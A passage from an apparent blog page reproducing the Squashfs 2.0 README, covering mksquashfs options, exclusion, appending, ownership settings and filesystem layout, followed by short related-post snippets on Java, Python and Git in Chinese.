directory containing that directory, rather than the contents of the directory -root-becomes <name> when appending source files/directories, make the original root become a subdirectory in the new root called <name>, rather than adding the new source items to the original root -all-root make all files owned by root -force-uid uid set all file uids to uid -force-gid gid set all file gids to gid -le create a little endian filesystem -be create a big endian filesystem -nopad do not pad filesystem to a multiple of 4K -check_data add checkdata for greater filesystem checks -root-owned alternative name for -all-root -noInodeCompression alternative name for -noI -noDataCompression alternative name for -noD -noFragmentCompression alternative name for -noF -sort <sort_file> sort files according to priorities in <sort_file>. One file or dir with priority per line. Priority -32768 to 32767, default priority 0 -ef <exclude_file> list of exclude dirs/files. One per line Source1 source2 ... are the source directories/files containing the files/directories that will form the squashfs filesystem. If a single directory is specified (i.e. mksquashfs source output_fs) the squashfs filesystem will consist of that directory, with the top-level root directory corresponding to the source directory. If multiple source directories or files are specified, mksquashfs will merge the specified sources into a single filesystem, with the root directory containing each of the source files/directories. The name of each directory entry will be the basename of the source path. If more than one source entry maps to the same name, the conflicts are named xxx_1, xxx_2, etc. where xxx is the original name. To make this clear, take two example directories. Source directory "/home/phillip/test" contains "file1", "file2" and "dir1". Source directory "goodies" contains "goodies1", "goodies2" and "goodies3". usage example 1: %mksquashfs /home/phillip/test output_fs This will generate a squashfs filesystem with root entries "file1", "file2" and "dir1". example 2: %mksquashfs /home/phillip/test goodies output_fs This will create a squashfs filesystem with the root containing entries "test" and "goodies" corresponding to the source directories "/home/phillip/test" and "goodies". example 3: %mksquashfs /home/phillip/test goodies test output_fs This is the same as the previous example, except a third source directory "test" has been specified. This conflicts with the first directory named "test" and will be renamed "test_1". Multiple sources allow filesystems to be generated without needing to copy all source files into a common directory. This simplifies creating filesystems. The -keep-as-directory option can be used when only one source directory is specified, and you wish the root to contain that directory, rather than the contents of the directory. For example: example 4: %mksquashfs /home/phillip/test output_fs -keep-as-directory This is the same as example 1, except for -keep-as-directory. This will generate a root directory containing directory "test", rather than the "test" directory contents "file1", "file2" and "dir1". The Dest argument is the destination where the squashfs filesystem will be written. This can either be a conventional file or a block device. If the file doesn't exist it will be created, if it does exist and a squashfs filesystem exists on it, mksquashfs will append. The -noappend option will write a new filesystem irrespective of whether an existing filesystem is present. 3.2 Changing compression defaults used in mksquashfs ---------------------------------------------------- There are a large number of options that can be used to control the compression in mksquashfs. By and large the defaults are the most optimum settings and should only be changed in exceptional circumstances! The -noI, -noD and -noF options (also -noInodeCompression, -noDataCompression and -noFragmentCompression) can be used to force mksquashfs to not compress inodes/directories, data and fragments respectively. Giving all options generates an uncompressed filesystem. The -no-fragments tells mksquashfs to not generate fragment blocks, and rather generate a filesystem similar to a Squashfs 1.x filesystem. It will of course still be a Squashfs 2.0 filesystem but without fragments, and so it won't be mountable on a Squashfs 1.x system. The -always-use-fragments option tells mksquashfs to always generate fragments for files irrespective of the file length. By default only small files less than the block size are packed into fragment blocks. The ends of files which do not fit fully into a block, are NOT by default packed into fragments. To illustrate this, a 100K file has an initial 64K block and a 36K remainder. This 36K remainder is not packed into a fragment by default. This is because to do so leads to a 10 - 20% drop in sequential I/O performance, as a disk head seek is needed to seek to the initial file data and another disk seek is need to seek to the fragment block. Specify this option if you want file remainders to be packed into fragment blocks. Doing so may increase the compression obtained BUT at the expense of I/O speed. The -no-duplicates option tells mksquashfs to not check the files being added to the filesystem for duplicates. This can result in quicker filesystem generation and appending although obviously compression will suffer badly if there is a lot of duplicate files. The -b option allows the block size to be selected, this can be either 4096, 8192, 16384, 32768 or 65536 bytes. 3.3 Specifying the UIDs/GIDs used in the filesystem --------------------------------------------------- By default files in the generated filesystem inherit the UID and GID ownership of the original file. However, mksquashfs provides a number of options which can be used to override the ownership. The options -all-root and -root-owned (both do exactly the same thing) force all file uids/gids in the generated Squashfs filesystem to be root. This allows root owned filesystems to be built without root access on the host machine. The "-force-uid uid" option forces all files in the generated Squashfs filesystem to be owned by the specified uid. The uid can be specified either by name (i.e. "root") or by number. The "-force-gid gid" option forces all files in the generated Squashfs filesystem to be group owned by the specified gid. The gid can be specified either by name (i.e. "root") or by number. 3.4 Excluding files from the filesystem --------------------------------------- The -e and -ef options allow files/directories to be specified which are excluded from the output filesystem. The -e option takes the exclude files/directories from the command line, the -ef option takes the exlude files/directories from the specified exclude file, one file/directory per line. If an exclude file/directory is absolute (i.e. prefixed with /, ../, or ./) the entry is treated as absolute, however, if an exclude file/directory is relative, it is treated as being relative to each of the sources in turn, i.e. %mksquashfs /tmp/source1 source2 output_fs -e ex1 /tmp/source1/ex2 out/ex3 Will generate exclude files /tmp/source1/ex2, /tmp/source1/ex1, source2/ex1, /tmp/source1/out/ex3 and source2/out/ex3. The -e and -ef exclude options are usefully used in archiving the entire filesystem, where it is wished to avoid archiving /proc, and the filesystem being generated, i.e. %mksquashfs / /tmp/root.sqsh -e proc /tmp/root.sqsh Multiple -ef options can be specified on the command line, and the -ef option can be used in conjuction with the -e option. 3.5 Appending to squashfs filesystems ------------------------------------- Running squashfs with the destination directory containing an existing filesystem will add the source items to the existing filesystem. By default, the source items are added to the existing root directory. To make this clear... An existing filesystem "image" contains root entries "old1", and "old2". Source directory "/home/phillip/test" contains "file1", "file2" and "dir1". example 1: %mksquashfs /home/phillip/test image Will create a new "image" with root entries "old1", "old2", "file1", "file2" and "dir1" example 2: %mksquashfs /home/phillip/test image -keep-as-directory Will create a new "image" with root entries "old1", "old2", and "test". As shown in the previous section, for single source directories '-keep-as-directory' adds the source directory rather than the contents of the directory. example 3: %mksquashfs /home/phillip/test image -keep-as-directory -root-becomes original-root Will create a new "image" with root entries "original-root", and "test". The '-root-becomes' option specifies that the original root becomes a subdirectory in the new root, with the specified name. The append option with file duplicate detection, means squashfs can be used as a simple versioning archiving filesystem. A squashfs filesystem can be created with for example the linux-2.4.19 source. Appending the linux-2.4.20 source will create a filesystem with the two source trees, but only the changed files will take extra room, the unchanged files will be detected as duplicates. 3.6 Miscellaneous options ------------------------- The -info option displays the files/directories as they are compressed and added to the filesystem. The original uncompressed size of each file is printed, along with DUPLICATE if the file is a duplicate of a file in the filesystem. The -le and -be options can be used to force mksquashfs to generate a little endian or big endian filesystem. Normally mksquashfs will generate a filesystem in the host byte order. Squashfs, for portability, will mount different ordered filesystems (i.e. it can mount big endian filesystems running on a little endian machine), but these options can be used for greater optimisation. The -nopad option informs mksquashfs to not pad the filesystem to a 4K multiple. This is performed by default to enable the output filesystem file to be mounted by loopback, which requires files to be a 4K multiple. If the filesystem is being written to a block device, or is to be stored in a bootimage, the extra pad bytes are not needed. 4. FILESYSTEM LAYOUT -------------------- Brief filesystem design notes follow for the original 1.x filesystem layout. A description of the 2.0 filesystem layout will be written sometime! A squashfs filesystem consists of five parts, packed together on a byte alignment: --------------- | superblock | |---------------| | data | | blocks | |---------------| | inodes | |---------------| | directories | |---------------| | uid/gid | | lookup table | --------------- Compressed data blocks are written to the filesystem as files are read from the source directory, and checked for duplicates. Once all file data has been written the completed inode, directory and uid/gid lookup tables are written. 4.1 Metadata ------------ Metadata (inodes and directories) are compressed in 8Kbyte blocks. Each compressed block is prefixed by a two byte length, the top bit is set if the block is uncompressed. A block will be uncompressed if the -noI option is set, or if the compressed block was larger than the uncompressed block. Inodes are packed into the metadata blocks, and are not aligned to block boundaries, therefore inodes overlap compressed blocks. An inode is identified by a two field tuple <start address of compressed block : offset into de-compressed block>. Inode contents vary depending on the file type. The base inode consists of: base inode: Inode type Mode uid index gid index The inode type is 4 bits in size, and the mode is 12 bits. The uid and gid indexes are 4 bits in length. Ordinarily, this will allow 16 unique indexes into the uid table. To minimise overhead, the uid index is used in conjunction with the spare bit in the file type to form a 48 entry index as follows: inode type 1 - 5: uid index = uid inode type 5 -10: uid index = 16 + uid inode type 11 - 15: uid index = 32 + uid In this way 48 unique uids are supported using 4 bits, minimising data inode overhead. The 4 bit gid index is used to index into a 15 entry gid table. Gid index 15 is used to indicate that the gid is the same as the uid. This prevents the 15 entry gid table filling up with the common case where the uid/gid is the same. The data contents of symbolic links are stored immediately after the symbolic link inode, inside the inode table. This allows the normally small symbolic link to be compressed as part of the inode table, achieving much greater compression than if the symbolic link was compressed individually. Similarly, the block index for regular files is stored immediately after the regular file inode. The block index is a list of block lengths (two bytes each), rather than block addresses, saving two bytes per block. The block address for a given block is computed by the summation of the previous block lengths. This takes advantage of the fact that the blocks making up a file are stored contiguously in the filesystem. The top bit of each block length is set if the block is uncompressed, either because the -noD option is set, or if the compressed block was larger than the uncompressed block. 4.2 Directories --------------- Like inodes, directories are packed into the metadata blocks, and are not aligned on block boundaries, therefore directories can overlap compressed blocks. A directory is, again, identified by a two field tuple <start address of compressed block containing directory start : offset into de-compressed block>. Directories are organised in a slightly complex way, and are not simply a list of file names and inode tuples. The organisation takes advantage of the observation that in most cases, the inodes of the files in the directory will be in the same compressed metadata block, and therefore, the inode tuples will have the same start block. Directories are therefore organised in a two level list, a directory header containing the shared start block value, and a sequence of directory entries, each of which share the shared start block. A new directory header is written once/if the inode start block changes. The directory header/directory entry list is repeated as many times as necessary. The organisation is as follows: directory_header: count (8 bits) inode start block (24 bits) directory entry: * count inode offset (13 bits) inode type (3 bits) filename size (8 bits) filename This organisation saves on average 3 bytes per filename. 4.3 File data ------------- File data is compressed on a block by block basis and written to the filesystem. The filesystem supports up to 32K blocks, which achieves greater compression ratios than the Linux 4K page size. The disadvantage with using greater than 4K blocks (and the reason why most filesystems do not), is that the VFS reads data in 4K pages. The filesystem reads and decompresses a larger block containing that page (e.g. 32K). However, only 4K can be returned to the VFS, resulting in a very inefficient filesystem, as 28K must be thrown away. Squashfs, solves this problem by explicitly pushing the extra pages into the page cache. 5. AUTHOR INFO -------------- Squashfs was written by Phillip Lougher, email [email protected], in Chepstow, Wales, UK. If you like the program, or have any problems, then please email me, as it's nice to get feedback!
Day25-Java基础之常用类1
m0_46053885的博客
04-27 895
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
Lambda表达式特点
weixin_57763462的博客
04-24 816
**API 设计**:Lambda 表达式鼓励使用函数式接口的设计模式,这改变了 Java 库的设计,例如 `java.util.function` 包下的一系列函数式接口。- **函数式编程**:Lambda 表达式引入了函数式编程的理念,使得 Java 更接近于函数式编程语言,如 Scala 和 Clojure。- **并发编程**:Lambda 表达式与 Java 8 新增的 Stream API 结合使用,可以简化并发编程,特别是与集合的操作相关。
selenium 4.x 入门(环境搭建、八大元素定位)
u014694915的博客
04-26 766
Web自动化测现状1.属于E2E测试2.过去通过点点点3.好的测试,还需要记录、调试网页的细节。
AttributeError: module ‘numpy‘ has no attribute ‘float‘.的解决方法
最新发布
chen_znn的博客
04-30 325
本文记录了AttributeError: module 'numpy' has no attribute 'float'.的解决方法
Python 二叉树的创建与遍历
youyouxiong的博客
04-24 440
Python中创建二叉树并进行遍历,我们首先需要定义一个二叉树节点类,然后创建二叉树,最后实现几种基本的遍历方法:前序、中序、后序和层序遍历。以下是具体的实现步骤: 2. 创建二叉树 创建二叉树通常是由用户根据需要输入节点值来构建,或者通过特定的算法生成。这里我们手动创建一个简单的二叉树: 3. 实现二叉树的遍历 前序遍历 (Preorder Traversal) 访问根节点,然后递归地遍历左子树,最后递归地遍历右子树。 中序遍历 (Inorder Traversal) 递归地遍历左子
gerrit 如何将当前提交合入到某一次提交里面
06-07
要将当前提交合入到某一次提交中,可以按照以下步骤进行操作: 1. 首先需要在 Gerrit 上找到要合入的提交,记下它的 Change ID。 2. 在本地使用 Git checkout 切换到要提交的分支。 3. 使用 Git rebase 命令将当前提交变基到要合入的提交之前,例如: ``` git rebase -i <要合入的提交的 SHA-1 值> ``` 这里的 `-i` 参数表示交互式变基,可以编辑提交信息。 4. 在编辑提交信息的界面中,将当前提交的操作改为“squash”或“fixup”,表示将其合并到要合入的提交中。例如: ``` pick abc123 Current commit message squash def456 Squashed commit message ``` 这里的 `abc123` 是当前提交的 SHA-1 值,`def456` 是要合入的提交的 SHA-1 值。 5. 保存并关闭提交信息编辑界面,Git 会自动将当前提交合并到要合入的提交中。 6. 最后使用 Git push 命令将变基后的提交推送到 Gerrit 上进行审核和合并。 注意:在进行变基操作时需要特别小心,因为它可能会改变提交历史,导致冲突和其他问题。一般情况下建议在进行变基操作前先备份当前分支。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值